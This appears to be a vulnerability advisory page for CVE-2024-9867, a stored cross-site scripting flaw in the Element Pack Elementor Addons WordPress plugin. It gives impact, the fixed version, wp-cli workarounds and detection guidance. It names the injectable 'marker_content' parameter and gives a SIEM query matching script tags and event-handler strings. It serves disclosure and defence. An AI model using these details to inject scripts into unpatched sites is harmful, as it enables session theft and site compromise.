CVE-2024-9867
📋 TL;DR
This vulnerability allows authenticated WordPress users with Contributor-level access or higher to inject malicious scripts into web pages using the Element Pack Elementor Addons plugin. The stored XSS payload executes whenever users view the compromised pages, potentially affecting all visitors to the vulnerable WordPress site.
💻 Affected Systems
- Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) WordPress plugin
📦 What is this software?
Element Pack by Bdthemes
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal session cookies, redirect users to malicious sites, deface websites, or perform actions on behalf of authenticated users, potentially leading to full site compromise.
Likely Case
Attackers with contributor access inject malicious scripts that steal visitor session data or redirect users to phishing pages.
If Mitigated
With proper input validation and output escaping, the vulnerability would be prevented, and with least privilege access controls, the attack surface would be significantly reduced.
🎯 Exploit Status
Exploitation requires authenticated access but is technically simple once an attacker has Contributor-level credentials.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 5.10.3 or later
Vendor Advisory: https://plugins.trac.wordpress.org/changeset/3180563/
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find 'Element Pack Elementor Addons'. 4. Click 'Update Now' if update is available. 5. Alternatively, download version 5.10.3+ from WordPress plugin repository and manually update.
🔧 Temporary Workarounds
Temporary Plugin Deactivation
allDisable the vulnerable plugin until patched
wp plugin deactivate bdthemes-element-pack-lite
Restrict User Roles
linuxTemporarily remove Contributor-level access from untrusted users
wp user list --role=contributor --field=ID | xargs wp user set-role subscriber
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to limit script execution
- Deploy web application firewall (WAF) rules to block XSS payloads in marker_content parameter
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin panel > Plugins > Element Pack Elementor Addons > Version. If version is 5.10.2 or lower, system is vulnerable.Check Version:
wp plugin get bdthemes-element-pack-lite --field=versionVerify Fix Applied:
Verify plugin version is 5.10.3 or higher in WordPress admin panel.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to admin-ajax.php with marker_content parameter containing script tags
- Multiple failed login attempts followed by successful Contributor-level login
Network Indicators:
- HTTP requests containing <script> tags in marker_content parameter
- Unexpected outbound connections from WordPress site to external domains
SIEM Query:
source="wordpress.log" AND ("marker_content" AND ("<script>" OR "javascript:" OR "onerror="))